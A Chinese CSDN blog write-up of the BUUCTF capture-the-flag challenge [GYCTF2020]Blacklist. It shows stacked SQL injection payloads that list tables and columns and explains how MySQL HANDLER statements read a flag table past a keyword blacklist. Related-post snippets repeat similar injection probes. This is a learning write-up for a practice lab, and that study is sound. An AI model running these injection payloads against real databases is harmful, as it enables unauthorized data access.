[GYCTF2020]Blacklist1

于 2024-05-21 17:58:55 发布
阅读量134 收藏 4
点赞数 3
分类专栏: BUUCTF练习题合集 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shierbai/article/details/139098796
版权

一次学习记录

这关过滤了非常多东西,也让我学到新的姿势

堆叠注入以及mysql的Handler语句

参考

[GYCTF2020]Blacklist 1-CSDN博客

这里是有想到报错注入,但后来发现这个flag给过滤掉了

于是用学到的堆叠注入

1';show tables;#

1';show columns from FlagHere;#

然后就是到这里,又需要用到Handler语句去不必提及flag列名就可以读取表内容

“MySQL 除了可以使用 select 查询表中的数据,也可使用 handler 语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler 语句并不具备 select 语句的所有功能。它是 MySQL 专用的语句,并没有包含到SQL标准中。”

HANDLER … OPEN语句打开一个表
HANDLER … READ语句访问
HANDLER … CLOSE关闭一个表

然后

如果需要读下一行就使用handler xxx next;

shierbai
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[GYCTF2020]Blacklist 1
m0_73728268的博客
03-15 373
2.继续构造payload,1’ or 1=1#,确定了闭合方式。使用接下来的语句 1’;1.感觉像是一种注入,blacklist黑名单绕过。更具一系列操作可以判断出闭合方式为。handler函数运用。
[GYCTF2020]Blacklist
weixin_52268949的博客
01-26 2352
[GYCTF2020]Blacklist(堆叠注入) 补充知识点 desc查看表结构的详细信息 desc table_name; PS:此处desc是describe的缩写,用法: desc 表名/查询语句 desc降序排列数据 select ename,sal from emp order by sal desc; 手动指定按照薪水由大到小排序(降序关键字desc) select ename,sal from emp order by sal asc; 手动指定按照薪水由小到大排序(升序关键字asc) P
web buuctf [GYCTF2020]Blacklist1
weixin_44214568的博客
03-18 1120
考点:堆叠注入;mysql查询语句handler 1.进行注入测试: 注入1' 提示语法错误; 注入1' or '1=1'# 返回表数据,有回显,存在字符型可注入漏洞; 2.联合查询:1' union select 1# 回显过滤 3.根据过滤事项,应该是堆叠查询 a.1'; show tables;# b.1';show columns from FlagHere;# 4.因为存在较多的过滤,利用Mysql数据库中的查询语法handler mysql除可使用se..
buuctf-[GYCTF2020]Blacklist1(小宇特详解)
小宇的web博客
02-09 1616
buuctf-[GYCTF2020]Blacklist1(小宇特详解) 1.先看题目是一道sql注入的题目 先尝试进行闭合 payload:1’ 这里可以试出来是'来进行闭合即可 2.然后尝试着进行联合查询 发现是进行了过滤。 3.这里尝试着进行堆叠注入 payload:1’;show tables;# 4.查表 payload:1’; show columns from FlagHere;# 这里屏蔽了许多东西 5.这里由于rename,和alter被过滤了,这里考虑利用HANDLER语句 这里
[GYCTF2020]Blacklist1-BUUCTF-详解
chinese_cabbage0的博客
02-05 1748
主要是buuctf的整个题目的解题过程,比较好理解,也比较全面,大家可以参考一下
android_system_blacklist_android_msm8610_
10-03
1. **qcom**:这通常表示这是针对高通(Qualcomm)处理器的优化或配置文件。QCOM是高通公司的代码别名,里面可能包含针对MSM8610的驱动程序、库或者其他专有设置。 2. **netd**:Netd是Android系统的网络守护进程,...
ipset-blacklist:一个bash脚本,禁止在黑名单中发布大量IP地址
02-05
ipset-blacklist:一个bash脚本,禁止在黑名单中发布大量IP地址
blacklist-jee
07-08
blacklist-jee 您将需要 Java8 来编译和运行。 检查您的应用程序是否正在运行在安装了 git、java8、docker 和 maven 的本地 Ubuntu VM 中进行开发先决条件:已安装 VirtualBox 和 Vagrant。 从该项目的根目录初始化...
Mikrotik-Blacklist
03-05
/tool fetch address=raw.githubusercontent.com host=raw.githubusercontent.com mode=https src-path=stathis/Mikrotik-Blacklist/master/a_blacklist_file.rsc/import a_blacklist_File.rsc其他资讯此回购应该...
cpf_blacklist
02-08
项目名为"cpf_blacklist-master"暗示这是一个主分支或主要版本,可能包含源代码、测试文件、文档和其他资源。 以下是围绕这个主题可能涉及的一些详细知识点: 1. **字符串操作**:在Python中,CPF号码通常以特定...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8343
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
eclipse本地的jar包配置Junit环境
最新发布
07-23
用于在eclipse中导入本地的jar包配置Junit环境,版本应该是JUnit4, 配置详情可参照我的博文:http://t.csdnimg.cn/GaqTZ
龙飞嵌入式POS餐饮应用方案介绍.doc
07-23
嵌入式
Struts 2.0 Java归档库文件包
07-23
Struts2.0是Java Web开发中非常重要的一个框架,它是Apache软件基金会的Jakarta项目下的一个产品。这个框架主要用于构建MVC(Model-View-Controller)架构的应用程序,为开发者提供了一种组织应用程序结构、处理HTTP请求以及展示数据的方式。在本压缩包中,包含的是一些Struts2.0的核心jar包、源代码和实例,这些内容对于学习和理解Struts2.0的工作原理和实际应用是非常有帮助的。 我们来详细解析一下Struts2.0的关键知识点: 1. **MVC模式**:Struts2.0基于MVC设计模式,它将应用程序的逻辑分为三个部分——模型(Model)、视图(View)和控制器(Controller)。模型负责业务逻辑,视图负责数据显示,控制器负责接收用户请求并调用相应的模型方法,更新视图。 2. **Action类**:在Struts2中,Action类是处理业务逻辑的核心组件。开发者需要创建Action类,并实现execute()方法,该方法会响应用户的请求,执行相应的业务操作。 3. **配置文件**:Struts2使用XML配
分拣设备_包括零件图_机械3D图可修改打包下载.zip
07-23
分拣设备_包括零件图_机械3D图可修改打包下载.zip
springcloud:Config配置中心demo源码案例演示
07-23
springcloud:Config配置中心demo源码案例演示
课程设计源码、报告资源
07-23
课程设计源码和报告资源是学生们在完成课程设计时经常需要寻找的重要资料。这些资源可以帮助学生理解课程设计的要求,掌握相关的编程技能,并最终完成符合要求的课程设计作品。以下是一些获取课程设计源码和报告资源的途径: 一、学校资源 课程资料: 大多数学校会在课程开始时提供相关的教材、课件和参考资料,其中可能包含课程设计的示例源码和报告模板。 学生可以积极利用这些资源,从中获取灵感和指导。 图书馆: 学校的图书馆通常收藏有大量的专业书籍和期刊,其中可能包含与课程设计相关的源码和报告。 学生可以通过图书馆的检索系统查找相关资源,并借阅或复印使用。 实验室和机房: 学校的实验室和机房往往配备有专业的软件和硬件设备,学生可以在这里进行课程设计的实践操作。 同时,实验室和机房也可能存放有往届学生的课程设计作品和源码,供学生参考和学习。 二、网络资源 在线课程平台: 如慕课网(MOOCs)、网易云课堂等在线课程平台提供了丰富的课程资源,其中可能包含与课程设计相关的视频教程、源码和报告示例。 学生可以根据自己的需求选择合适的课程进行学习,并参考其中的源码和报告。 开源社区和代码托管平台: 开源社区如Git
b055艺体培训机构业务管理系统-springboot+vue+elementui.zip(可运行源码+sql文件+文档)
07-23
艺体培训机构业务管理系统在对开发工具的选择上也很慎重,为了便于开发实现,选择的开发工具为Eclipse,选择的数据库工具为Mysql。以此搭建开发环境实现艺体培训机构业务管理系统的功能。其中管理员管理用户,新闻公告。 艺体培训机构业务管理系统是一款运用软件开发技术设计实现的应用系统,在信息处理上可以达到快速的目的,不管是针对数据添加,数据维护和统计,以及数据查询等处理要求,艺体培训机构业务管理系统都可以轻松应对。 学员信息管理页面,此页面提供给管理员的功能有:学员信息的查询管理,可以删除学员信息、修改学员信息、新增学员信息,还进行了对用户名称的模糊查询的条件。课程信息管理页面,此页面提供给管理员的功能有:查看已发布的课程信息数据,修改课程信息,课程信息作废,即可删除,还进行了对课程信息名称的模糊查询 课程信息信息的类型查询等等一些条件。活动信息管理页面,此页面提供给管理员的功能有:根据活动信息进行条件查询,还可以对活动信息进行新增、修改、查询操作等等。公告信息管理页面,此页面提供给管理员的功能有:根据公告信息进行新增、修改、查询操作等等。
运用YOLOv5模型进行垃圾类别目标识别
07-23
本项目采用YOLOv5实现垃圾分类目标检测。利用大量已标注目标检测数据集进行训练,对居民生活垃圾图片进行检测,找出图片中属于哪个类别的垃圾,并指示出在图片中的位置。 本工程YOLOv5使用PyTorch版的ultralytics/yolov5,在Windows系统上进行垃圾分类目标检测的项目演示。具体项目过程包括:数据集及格式转换、探索性数据分析(EDA)、安装软件环境、安装YOLOv5、修改YOLOv5代码(为支持中文标签)、训练集和测试集自动划分、修改配置文件、准备Weights&Biases训练可视化工具、训练网络模型、测试训练出的网络模型和性能统计。。内容来源于网络分享,如有侵权请联系我删除。另外如果没有积分的同学需要下载,请私信我。
blacklist floppy
06-28
很抱歉,"blacklist floppy"似乎不是一个标准命令或者术语,也没有直接关联到Python或者其他常见编程语言的操作。它看起来像是某种特定上下文或系统的操作,但没有足够的信息来提供详细的指导。如果你是在询问如何在某个特定的软件、系统或配置文件中阻止或阻止访问名为"floppy"的设备(如软盘驱动器),那么具体步骤会依赖于那个系统的设置。通常,在Linux系统中,可能涉及到修改`/etc/fstab`文件来禁用自动挂载,或者在防火墙规则中添加阻止对特定设备的访问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值